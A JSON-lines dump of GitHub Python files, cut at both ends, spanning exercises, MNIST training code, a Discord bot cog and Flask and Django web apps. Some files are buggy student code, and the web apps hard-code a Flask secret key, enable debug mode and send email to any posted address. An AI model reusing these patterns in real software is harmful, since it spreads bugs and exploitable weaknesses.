None\n","repo_name":"tohabyuraev/Elka","sub_path":"scripts/mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2924491268","text":"from multiprocessing.connection import answer_challenge\n\nimport string\ndef cap_each_word(string1):\n if len(string1)<1:\n return string1\n result = \"\"\n word_array = string1.split(\" \",)\n for x in word_array:\n if len(result)>0:\n result = result + \" \" + x.strip().capitalize()\n else:\n result = x.capitalize()\n if not result:\n reurn = string1\n else:\n return result\n \nresult1 =\"how can mirrors be real if our eyes aren't real\"\nresult = cap_each_word(result1)\nprint(result)\n\nnewStr = \"it's going to be sunny\"\ndef capitalize(string):\n answer = \"\"\n string2 = string.split()\n for elems in string2:\n #capitalize each word and add it to a string\n if len(answer)>0:\n answer = answer + \" \" + elems.strip().capitalize()\n else:\n answer = elems.capitalize()\n #if still is still empty return capitalized\n if not answer:\n return string\n else:\n return answer\n\n print(string2)\ncapitalize(\"It's going to be sunny\")\n\nexample = \"winning is a choice,lets go get it\"\nresult = \" \".join(x.capitalize() for x in example.split())\nresult2 = string.capwords(example)\nprint (result2)","repo_name":"JoshkefGhost6958/strings","sub_path":"newu.py","file_name":"newu.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34426169355","text":"import sys\n\nimport numpy as np\nimport tensorflow as tf\nfrom absl import flags\nfrom keras.utils.data_utils import get_file\n\nfrom deepray.datasets.datapipeline import DataPipeLine\nfrom deepray.utils.horovod_utils import get_rank, get_world_size\n\nFLAGS = flags.FLAGS\nFLAGS([\n sys.argv[0],\n \"--num_train_examples=60000\",\n])\n\n\nclass Mnist(DataPipeLine):\n\n def __init__(self, path=\"mnist.npz\"):\n \"\"\"Loads the MNIST dataset.\n\n This is a dataset of 60,000 28x28 grayscale images of the 10 digits,\n along with a test set of 10,000 images.\n More info can be found at the\n [MNIST homepage](http://yann.lecun.com/exdb/mnist/).\n\n Args:\n path: path where to cache the dataset locally\n (relative to `~/.keras/datasets`).\n\n Returns:\n Tuple of NumPy arrays: `(x_train, y_train), (x_test, y_test)`.\n\n **x_train**: uint8 NumPy array of grayscale image data with shapes\n `(60000, 28, 28)`, containing the training data. Pixel values range\n from 0 to 255.\n\n **y_train**: uint8 NumPy array of digit labels (integers in range 0-9)\n with shape `(60000,)` for the training data.\n\n **x_test**: uint8 NumPy array of grayscale image data with shapes\n (10000, 28, 28), containing the test data. Pixel values range\n from 0 to 255.\n\n **y_test**: uint8 NumPy array of digit labels (integers in range 0-9)\n with shape `(10000,)` for the test data.\n\n Example:\n\n ```python\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n assert x_train.shape == (60000, 28, 28)\n assert x_test.shape == (10000, 28, 28)\n assert y_train.shape == (60000,)\n assert y_test.shape == (10000,)\n ```\n\n License:\n Yann LeCun and Corinna Cortes hold the copyright of MNIST dataset,\n which is a derivative work from original NIST datasets.\n MNIST dataset is made available under the terms of the\n [Creative Commons Attribution-Share Alike 3.0 license.](\n https://creativecommons.org/licenses/by-sa/3.0/)\n \"\"\"\n super().__init__()\n origin_folder = (\"https://storage.googleapis.com/tensorflow/tf-keras-datasets/\")\n self.path = get_file(\n path,\n origin=origin_folder + \"mnist.npz\",\n file_hash=( # noqa: E501\n \"731c5ac602752760c8e48fbffcf8c3b850d9dc2a2aedcf2cc48468fc17b673d1\"\n ),\n )\n\n def build_dataset(\n self, input_file_pattern, batch_size, is_training=True, prebatch_size=0, epochs=1, shuffle=True, *args, **kwargs\n ):\n with np.load(self.path, allow_pickle=True) as f:\n if is_training:\n x, y = f[\"x_train\"], f[\"y_train\"]\n else:\n x, y = f[\"x_test\"], f[\"y_test\"]\n\n dataset = tf.data.Dataset.from_tensor_slices(\n (tf.cast(x[..., tf.newaxis] / 255.0, tf.float32), tf.cast(y, tf.int64))\n )\n if self.use_horovod:\n # For multi-host training, we want each hosts to always process the same\n # subset of files. Each host only sees a subset of the entire dataset,\n # allowing us to cache larger datasets in memory.\n dataset = dataset.shard(num_shards=get_world_size(), index=get_rank())\n dataset = dataset.repeat(epochs).shuffle(10000).batch(batch_size)\n return dataset\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/datasets/mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"9175222856","text":"\"\"\"\nhttps://www.reddit.com/r/Python/comments/tceagd/better_oop_in_python_no_self_needed_anymore/\n\"\"\"\n\n# pylint:disable = missing-class-docstring,missing-function-docstring,invalid-name\n# pylint:disable = attribute-defined-outside-init,no-method-argument\n# mypy: ignore-errors\n\nimport types\n\nclass ClassNamespace(types.SimpleNamespace):\n def __init__(self,superclass,name):\n for k,v in superclass.__dict__.items():\n self.__dict__.update({k:v})\n self.class_name = name\n def __repr__(self):\n items = (f\"{k}={v!r}\" for k, v in self.__dict__['fields'].items())\n itemstr = \",\".join(items)\n return f\"Instance of {self.class_name} with fields {itemstr}\"\n def my_fields(self):\n return self.__dict__['fields']\n def empty():\n empty_class = ClassNamespace(types.SimpleNamespace(),\"Object\")\n empty_class.__dict__.update({'fields':{}})\n return empty_class\n\ndef Counter(superclass=ClassNamespace.empty()):\n obj = ClassNamespace(superclass,\"Counter\")\n fields = obj.my_fields()\n fields.update({'value':0})\n def incrValue(qt=1):\n nonlocal fields\n fields['value'] += qt\n def decrValue(qt=1):\n nonlocal fields\n fields['value'] -= qt\n def conditionedIncr(qt=1):\n nonlocal fields\n if fields.get('flag',True):\n incrValue(qt)\n else:\n decrValue(qt)\n def getValue():\n nonlocal fields\n return fields['value']\n obj.incrValue = incrValue\n obj.decrValue = decrValue\n obj.getValue = getValue\n obj.conditionedIncr = conditionedIncr\n return obj\n\ndef Flagger(superclass=ClassNamespace.empty()):\n obj = ClassNamespace(superclass,\"Flagger\")\n fields = obj.my_fields()\n fields.update({'flag':False})\n def toggle():\n nonlocal fields\n fields['flag'] = not fields['flag']\n def getFlag():\n nonlocal fields\n return fields['flag']\n obj.toggle = toggle\n obj.getFlag = getFlag\n return obj\n\ndef do_twice(func,*args):\n func(*args)\n func(*args)\n\nc = Counter()\nc.incrValue()\nc.incrValue(3)\nc2 = Counter()\ndo_twice(c2.decrValue,2)\nprint(c.getValue(),c2.getValue())\nprint(c)\nprint(c2)\n\nf = Flagger(c)\nprint(f.getFlag(),f.getValue())\nf.toggle()\nprint(f.getFlag(),f.getValue())\nf.incrValue()\nprint(f.getFlag(),f.getValue())\nf.conditionedIncr()\nprint(f.getFlag(),f.getValue())\nprint(f)\nf2 = Flagger(f)\nprint(f2)\n","repo_name":"Cobord/Cursed","sub_path":"cursed_OOP.py","file_name":"cursed_OOP.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71966070888","text":"import config\nimport discord\nfrom discord.ext import commands\nfrom discord.ui import View\nfrom discord import ButtonStyle\nfrom util.reddit_scraper import get_subreddit_drama, get_aita\n\nclass Reddit(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n reddit_group = discord.SlashCommandGroup('reddit', 'Commands which retrieve top posts from subreddits', guild_ids=[config.GUILD_ID])\n\n @reddit_group.command(description='What\\'s trending on r/AmITheAsshole')\n async def aita(self, ctx: discord.ApplicationContext):\n try:\n await ctx.defer()\n post = await get_aita()\n except Exception as e:\n return await ctx.respond('Unable to find an asshole. Try the mirror.', ephemeral=True) \n \n # must truncate embed descriptions to 4096 chars\n if len(post['desc']) > 4096:\n post['desc'] = post['desc'][:4096-3] + '...' \n\n embed = discord.Embed(\n title=post['title'],\n url=f\"https://reddit.com{post['link']}\",\n description=post['desc']\n )\n embed.set_footer(text=f\"{post['upvotes']} upvotes\")\n embed.set_author(name=post['author'])\n\n await ctx.respond(embed=embed, view=AitaView(post))\n\n @reddit_group.command(description='What\\'s trending on r/SubredditDrama')\n async def subreddit_drama(self, ctx: discord.ApplicationContext):\n try:\n await ctx.defer()\n post = await get_subreddit_drama()\n except Exception as e:\n return await ctx.respond('Unable to find a spicy story :/', ephemeral=True) \n \n # must truncate embed descriptions to 4096 chars\n if len(post['desc']) > 4096:\n post['desc'] = post['desc'][:4096-3] + '...' \n\n embed = discord.Embed(\n title=post['title'],\n url=f\"https://reddit.com{post['link']}\",\n description=post['desc']\n )\n embed.set_footer(text=f\"{post['upvotes']} upvotes\")\n embed.set_author(name=post['author'])\n\n await ctx.respond(embed=embed)\n\nclass AitaView(View):\n def __init__(self, post):\n super().__init__()\n self.post = post\n\n @discord.ui.button(label='YTA', style=ButtonStyle.red)\n async def yta_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='NTA', style=ButtonStyle.green)\n async def nta_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='ESH', style=ButtonStyle.blurple)\n async def esh_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n \n @discord.ui.button(label='NAH', style=ButtonStyle.gray)\n async def nah_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n @discord.ui.button(label='INFO', style=ButtonStyle.grey)\n async def info_callback(self, button, interaction):\n await interaction.response.send_message( \n content=self.get_response(button.label), ephemeral=True)\n\n # must truncate it to 2000 characters\n def get_response(self, guess):\n if self.post['sdec'] == \"None\": \n content = f\"Unable to locate a top comment with a valid decision. {self.post['decision']}\"\n elif guess == self.post['sdec']: \n content = f\"{guess} was **correct**! {self.post['decision']}\"\n else: \n content = f\"{guess} was **incorrect**! {self.post['decision']}\"\n if len(content) > 2000:\n content = content[:2000-3] + '...'\n return content\n\ndef setup(bot):\n bot.add_cog(Reddit(bot))","repo_name":"ericpretzel/wid-bot","sub_path":"extension/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35964669129","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlabels = ['centro', 'consolacao', 'interlagos', 'mooca']\nmeans1 = [15, 16, 12, 13]\nmeans2 = [15.5, 16.5, 12, 14]\nmeans3 = [14.5, 15.5, 11, 11]\n\nx = np.arange(len(labels))\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(x - 0.35/3, means1, 0.35, label='Cifra')\nrects2 = ax.bar(x + 0.35/3, means2, 0.35, label='S16')\nrects3 = ax.bar(x + 0.35/12, means3, 0.35, label='Banco Presil')\n\nax.set_ylabel('Tempo (anos)')\nax.set_title('Tempo para adquirir o imóvel nas regiões de SP')\nax.set_xticks(x)\nax.set_xticklabels(labels)\nax.legend()\n\ndef insert(rects):\n for rect in rects:\n height = rect.get_height()\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\ninsert(rects1)\ninsert(rects2)\ninsert(rects3)\nfig.tight_layout()\nplt.show()","repo_name":"felipe-dias-azevedo/Finoban","sub_path":"crawler/demo/metrica.py","file_name":"metrica.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1367850141","text":"from django.shortcuts import render\nfrom .models import *\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.shortcuts import redirect\n\n# Create your views here.\ndef index(request):\n return render(request=request,\n template_name=\"main/index.html\",\n context={\"profile\":Profile.objects.all()[0],\n \"job_positions\":JobPosition.objects.all})\n\ndef send_email(request):\n if request.method == \"POST\":\n name = request.POST[\"name\"]\n receiver_email = request.POST[\"email\"]\n phone = request.POST[\"phone\"]\n message = request.POST[\"message\"]\n print(name, receiver_email)\n\n sender_email = settings.EMAIL_HOST_USER\n subject = 'Hi, I have an inquiry'\n recipient_list = [receiver_email,]\n \n send_mail( subject, message, sender_email, recipient_list )\n \n return redirect('/')\n else:\n return redirect('/')","repo_name":"roycechua/advanced-python-programming","sub_path":"profile_activity/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5918956273","text":"import torch\nfrom torch import optim, nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\n\n\nclass SimpleNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(SimpleNet, self).__init__()\n self.layer1 = nn.Linear(in_dim, n_hidden_1)\n self.layer2 = nn.Linear(n_hidden_1, n_hidden_2)\n self.layer3 = nn.Linear(n_hidden_2, out_dim)\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nclass ActivationNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(ActivationNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Linear(in_dim, n_hidden_1), nn.ReLU(True)\n )\n self.layer2 = nn.Sequential(\n nn.Linear(n_hidden_1, n_hidden_2), nn.ReLU(True)\n )\n self.layer3 = nn.Sequential(\n nn.Linear(n_hidden_2, out_dim)\n )\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nclass BatchNet(nn.Module):\n def __init__(self, in_dim, n_hidden_1, n_hidden_2, out_dim):\n super(BatchNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Linear(in_dim, n_hidden_1),\n nn.BatchNorm1d(n_hidden_1), nn.ReLU(True)\n )\n self.layer2 = nn.Sequential(\n nn.Linear(n_hidden_1, n_hidden_2),\n nn.BatchNorm1d(n_hidden_2), nn.ReLU(True)\n )\n self.layer3 = nn.Sequential(nn.Linear(n_hidden_2, out_dim))\n\n def forward(self, x):\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n return x\n\n\nbatch_size = 64\nlearning_rate = 1e-2\n\ndata_tf = transforms.Compose([transforms.ToTensor(),transforms.Normalize([0.5], [0.5])])\n\n\n# download data\ntrain_dataset = datasets.MNIST(root='./data', train=True, transform=data_tf, download=True)\ntest_dataset = datasets.MNIST(root='./data', train=False, transform=data_tf)\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n\n# model = SimpleNet(28 * 28, 300, 100, 10)\nmodel = BatchNet(28*28, 300, 100, 10)\nif torch.cuda.is_available():\n model = model.cuda()\n print(1)\nelse:\n print(2)\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(model.parameters(), lr=learning_rate)\n\n# train\nepoch = 0\nfor data in train_loader:\n # get img and label\n img, label = data\n img = img.view(img.size(0), -1)\n if torch.cuda.is_available():\n img = img.cuda()\n label = label.cuda()\n else:\n # transfor data to tensor\n img = Variable(img)\n label = Variable(label)\n\n # forward\n out = model(img)\n loss = criterion(out, label)\n print_loss = loss.data.item()\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n epoch += 1\n if epoch % 50 == 0:\n print('epoch: {}, loss: {:.4}'.format(epoch, loss.data.item()))\n\nmodel.eval()\n# The sum of loss,the sum of acc\neval_loss = 0\neval_acc = 0\n# use test to test\nfor data in test_loader:\n # get image\n img, label = data\n img = img.view(img.size(0), -1)\n if torch.cuda.is_available():\n img = Variable(img, volatile=True).cuda()\n label = Variable(label, volatile=True).cuda()\n else:\n image = Variable(img, volatile=True)\n label = Variable(label, volatile=True)\n\n # forward\n out = model(img)\n loss = criterion(out, label)\n\n eval_loss += loss.data.item() * label.size(0)\n # get the test resule\n _, pred = torch.max(out, 1)\n # check it\n num_correct = (pred == label).sum()\n\n # the sum of true result\n eval_acc += num_correct.item()\n\n# print result\nprint('Test Loss: {:.6f}, Acc: {:.6f}'.format(\n eval_loss / (len(test_dataset)),\n eval_acc / (len(test_dataset))\n))","repo_name":"tangyongchao68/Digit-recognition","sub_path":"Full_mnist.py","file_name":"Full_mnist.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28339401453","text":"#import thư viện\nfrom flask import Flask, render_template, request, url_for, session\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport csv\nfrom werkzeug.utils import secure_filename\nfrom sklearn.cluster import KMeans\nimport uuid #Random Short Id\nimport os\nimport scipy.cluster.hierarchy as sch \nfrom sklearn.cluster import AgglomerativeClustering\n\nUPLOAD_FOLDER = 'static/uploads/kmeans' #Đường dẫn thư mục upload\nALLOWED_EXTENSIONS = {'csv'}#tập tin cho phép\n\napp = Flask(__name__)#mở đầu thư viện flask\n\n#upload tập tin \napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/' #Secret key of Session\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#hàm truyền vào khi khởi động, hiển thị trang index chính\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')# Trang chủ \n\n#vào thư mục kmeans, hiển thị trang index của giải thuật kmeans\n@app.route('/kmeans', methods=['GET', 'POST'])\ndef kmeans_index():\n return render_template('kmeans/index.html')# Trang chủ \n\n#File được cho phép\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n#Hiển thị data của giải thuật kmeans khi nạp dữ liệu\n@app.route('/kmeans/data', methods=['GET', 'POST'])\ndef kmeans_data():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n errors = 'No file part! Please choose 1 file csv !'\n return render_template('kmeans/data.html', errors=errors)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n errors = 'No selected file'\n return render_template('kmeans/data.html', errors=errors)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4())[:8] + '_' + filename)\n file.save(file_path)\n\n session['csvfile'] = file_path #Save path file to session\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5'] \n data = pd.read_csv(file_path, names = columns_name_attribute)\n \n m = data.shape[1]\n return render_template('kmeans/data.html', data=data.to_html(table_id='myTable', classes='table table-striped', header=True, index=False), m=m)\n\n#Hiển thị đồ thị elbow khi người dùng chọn nhóm\n@app.route('/kmeans/elbow', methods=['GET', 'POST'])\ndef kmeans_elbow():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path, names = columns_name_attribute)\n col = request.form.getlist('cot') #Get values of checkbox form from\n col = np.array(col)\n col1 = col[0]\n col2 = col[1]\n session['col1'] = col1 #Save column to session\n session['col2'] = col2 #Save column to session\n m = data.shape[1]\n bd = 0\n X = data.iloc[int(bd):, [int(col1), int(col2)]]\n n = data.shape[0]\n # Tiến hành gom nhóm (Elbow)\n # Chạy thuật toán KMeans với k = (1, 10)\n\n clusters = []\n for i in range(1, 10):\n km = KMeans(n_clusters=i).fit(X)\n clusters.append(km.inertia_)\n\n fig, ax = plt.subplots(figsize=(12, 8))\n sns.lineplot(x=list(range(1, 10)), y=clusters, ax=ax)\n\n ax.set_title(\"Đồ thị Elbow\")\n ax.set_xlabel(\"Số lượng nhóm\")\n ax.set_ylabel(\"Gía trị Inertia\")\n\n image = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_elbow.png'\n plt.savefig(image)\n plt.clf()\n\n return render_template('kmeans/elbow.html', url1='/'+image)\n\n#hiển thị kết quả\n@app.route('/kmeans/ketqua', methods=['GET', 'POST'])\ndef kmeans_clasf():\n file_path = session.get('csvfile')#lấy đường dẫn file csv\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']#tên thuộc tính cột\n data = pd.read_csv(file_path,names= columns_name_attribute)\n cola = session.get(\"col1\")#lấy giá trị cột a\n colb = session.get(\"col2\")#lấy giá trị cột b\n bd = 0\n X = data.iloc[int(bd):, [int(cola), int(colb)]].values#dữ liệu cần phân hoạch\n k = request.form.get('cluster')#lấy giá trị k \n km3 = KMeans(n_clusters= int(k))#chạy giải thuật kmeans\n y_means = km3.fit_predict(X)\n listcolor = ['pink','red','blue','green','yellow']#tạo danh sách màu\n color = []\n for i in range(5):\n color.append(listcolor[i])\n for i in range(int(k)):\n plt.scatter(X[y_means == i, 0], X[y_means == i, 1], s = 100, c = color[i]) \n #tâm của mỗi nhóm\n plt.scatter(km3.cluster_centers_[:,0], km3.cluster_centers_[:, 1], s = 100, c = 'orange' , label = 'Centeroid') \n plt.style.use('fivethirtyeight') \n plt.title('K Means Clustering', fontsize = 20) \n plt.xlabel('Annual Income') \n plt.ylabel('Spending Score') \n plt.legend() \n plt.grid() \n img = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_kq.png'\n plt.savefig(img)\n #hiên thị hình ảnh phân hoạch\n return render_template('kmeans/ketqua.html', url2='/'+img)\n\n###################################################################giai thuat AGG\n#chạy trang index trong thư mục agg\n@app.route('/agg', methods=['GET', 'POST'])\ndef agg_index():\n return render_template('agg/index.html')# Trang chủ\n\n#hiển thị dữ liệu khi người dùng nạp lên trang web\n@app.route('/agg/data', methods=['GET', 'POST'])\ndef agg_data():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n errors = 'No file part! Please choose 1 file csv !'\n return render_template('agg/data.html', errors=errors)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n errors = 'No selected file'\n return render_template('agg/data.html', errors=errors)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4())[:8] + '_' + filename)\n file.save(file_path)\n\n session['csvfile'] = file_path #Save path file to session\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5'] \n data = pd.read_csv(file_path, names = columns_name_attribute)\n \n m = data.shape[1]\n return render_template('agg/data.html', data=data.to_html(table_id='myTable', classes='table table-striped', header=True, index=False), m=m)\n\n#Hiển thị đồ thị elbow\n@app.route('/agg/dendrogram', methods=['GET', 'POST'])\ndef agg_dendrogram():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path, names = columns_name_attribute)\n col = request.form.getlist('cot') #Get values of checkbox form from\n col = np.array(col)\n col1 = col[0]\n col2 = col[1]\n session['col1'] = col1 #Save column to session\n session['col2'] = col2 #Save column to session\n m = data.shape[1]\n hihi = 0\n X = data.iloc[int(hihi):, [int(col1), int(col2)]]\n n = data.shape[0]\n\n clusters = []\n dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward')) \n plt.title('Dendrogram') \n plt.xlabel('Khách hàng') \n plt.ylabel('Khoảng cách Euclidean') \n image = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_ded.png'\n plt.savefig(image)\n plt.clf()\n\n return render_template('agg/dendrogram.html', url1='/'+image)\n\n#hiển thị kết quả\n@app.route('/agg/ketqua', methods=['GET', 'POST'])\ndef agg_clasf():\n file_path = session.get('csvfile')\n columns_name_attribute = ['Col1','Col2','Col3','Col4','Col5']\n data = pd.read_csv(file_path,names= columns_name_attribute)\n cola = session.get(\"col1\")\n colb = session.get(\"col2\")\n bd = 0\n X = data.iloc[int(bd):, [int(cola), int(colb)]].values\n k = request.form.get('cluster')\n hc = AgglomerativeClustering(n_clusters = int(k), affinity = 'euclidean', linkage = 'ward') \n y_hc = hc.fit_predict(X) \n listcolor = ['pink','red','blue','green','yellow']\n color = []\n for i in range(5):\n color.append(listcolor[i])\n for i in range(int(k)):\n plt.scatter(X[y_hc == i, 0], X[y_hc == i, 1], s = 100, c = color[i])\n plt.title('AGG Clustering', fontsize = 20) \n plt.xlabel('Annual Income') \n plt.ylabel('Spending Score') \n plt.legend() \n plt.grid() \n img = 'static/images_kmeans/'+ str(uuid.uuid4())[:8] +'_kq1.png'\n plt.savefig(img)\n #hiển thị hình ảnh được phân hoạch\n return render_template('agg/ketqua.html', url2='/'+img) \n\n#hamg main\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n","repo_name":"chaub1609762/doankkdl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9106,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21772538517","text":"from pathlib import Path\n\np = Path('C:\\Files2020_Dev\\ByProject\\Open15C_Data\\SEC_IndexFiles').glob('*.idx')\nxFiles = [e for e in p]\nfor y in xFiles:\n print(y)\nprint('new')\n\nfor e in p:\n print(e)","repo_name":"maxrottersman/Open15C","sub_path":"ztest.py","file_name":"ztest.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42205159776","text":"# Task3 :\n# Question 1\nchairs = '15'\nnails = 4\ntotal_nails = chairs * nails #Convert the chairs into integer\nmessage = 'I need to buy {} nails'.format(total_nails)\nprint(message)\n\n# Question 2\nmy_name = 'Penelope'\nmy_age = 29\nmessage = 'My name is {} and I am {} years old'.format(my_name, my_age)\nprint(message)\n\n# Question 2\n# box_count = int(input(\"Number of boxes:\"))\n# eggs_per_box = int(input(\"Number of eggs per box:\"))\n# eggs_per_omelette = int(input(\"Number of eggs required for one omelette:\"))\n# omelette_count = (box_count * eggs_per_box ) // eggs_per_omelette\n# print(\"You can make {} omelettes with {} boxes of eggs\".format(omelette_count,box_count) )\n\n# Question 4\n# Complete a series of tasks to format strings\n\n# Task 1 - Replace the (.) character with (!) instead. Output should be “I love coding!”\n\nmy_str = \"I love coding.\"\nmy_str = my_str.replace( '.','!' )\nprint(my_str)\n# Task 2\nmy_str_1 = \"EVERY Exercise Brings Me Closer to Completing my GOALS.\"\nmy_str_1 = my_str_1.lower()\nprint(my_str_1)\n# Task 3\nmy_str_2 = \"We enjoy travelling\"\nans_1 = (my_str_2[0] == 'A')\nprint(ans_1)\n# Task 4\nmy_str_3=\"1.458.001\"\n# Type your code here:\nans_2 = len(my_str_3)\nprint(ans_2)\n\n# Question 5\n# Task 1: \"thon\".\nwrd=\"Python\"\nans_1 = wrd[2:]\nprint(ans_1)\n# Task 2 - Slice the word until \"o\". (Pyth)\nwrd=\"Python\"\nans_1 = wrd[:4]\nprint(ans_1)\n\n# Task 3 - Now try to get \"th\" only.\nwrd=\"Python\"\nans_1 = wrd[2:4]\nprint(ans_1)\n\n# Task 4 - Now slice the word with steps of 2, excluding first and last characters\n\nwrd=\"Python\"\nans_1 = wrd[1:-1:2]\nprint(ans_1)\n\n# Question 6\nfor number in range(4):\n\toutput = 'o' * number\n\tprint(output)\n# Question 7\ndef calculate_vat(amount):\n\treturn (amount * 1.2)\ntotal = calculate_vat(100)\nprint(total)\n\n# Write a new function to print a ‘cashier receipt’ output for a shop (any shop – clothes, food, events etc).\n# It should accept 3 items, then sum them up and print out a detailed receipt with TOTAL.\n\n# Question 8\n# Input:\n# Item_1_name = ‘Trainers’\n# Item_1_price = 50.45\n# Item_2_name = ‘T-shirt\n# Item_2_price = 12\n# Output:\n# Trainers\t50.45\n# T-shirt\t12.00\n# TOTAL \t62.45\n\n\n\ndef cashier_receipt(item_count):\n\titems = [];\n\tfor i in range(item_count):\n\t\titem = { }\n\t\titem_name = input(\"Item name :\")\n\t\titem['name'] = item_name\n\t\titem_price = int(input(\"Item Price:\"))\n\t\titem['price'] = item_price\n\t\titems.append((item))\n\t# print(items)\n\ttotal_cost = 0\n\tfor i in items:\n\t\ttotal_cost += i['price']\n\t\tprint(f\"{i['name']} {i['price']}\")\n\tprint(\"Total \",total_cost)\n\nno_of_items = int(input(\"No of items purchased : \"))\ncashier_receipt(no_of_items)\n\n\n\n\n\t# for i in range(item_count):\n\t# \tprint(items[i])\n\t# item_1_name = input(\"Item1 name :\")\n\t# item_1_price = int(input(\"Item1 Price:\"))\n\t# item_2_name = input(\"Item1 name :\")\n\t# item_2_price = int(input(\"Item1 Price:\"))\n\t# item_3_name = input(\"Item1 name :\")\n\t# item_3_price = int(input(\"Item1 Price:\"))","repo_name":"Jyothyrajs/CFGClassworks","sub_path":"Hw2.py","file_name":"Hw2.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34859445010","text":"import os\n\nfrom bs4 import BeautifulSoup\n\nfrom dataobjects.detail_keeper_do import DetailsKeeperDO\nfrom filehandler.connection_creator import ConnectionCreator\nfrom stringfinder.reference_finder import ReferenceFinder\nfrom stringfinder.source_replacer import SourceReplacer\n\nfile_tree = dict()\nfile_creation_map = dict()\n\n\ndef incl_tree(file_name, target_dir_path):\n global file_tree\n global file_creation_map\n\n reference_finder = ReferenceFinder()\n with open(file_name) as source_file:\n source = source_file.read()\n source = source.replace(\"\\n\", \" \")\n php = reference_finder.get_php_occurrences(source)\n if php.__len__() != 0:\n includes = reference_finder.get_included_php_file_paths(php, DetailsKeeperDO.\n get_source_dir_path(DetailsKeeperDO),\n need_compl_path=True)\n if includes.__len__() != 0:\n for include_file in includes:\n if os.path.exists(str(include_file)):\n incl_counter = 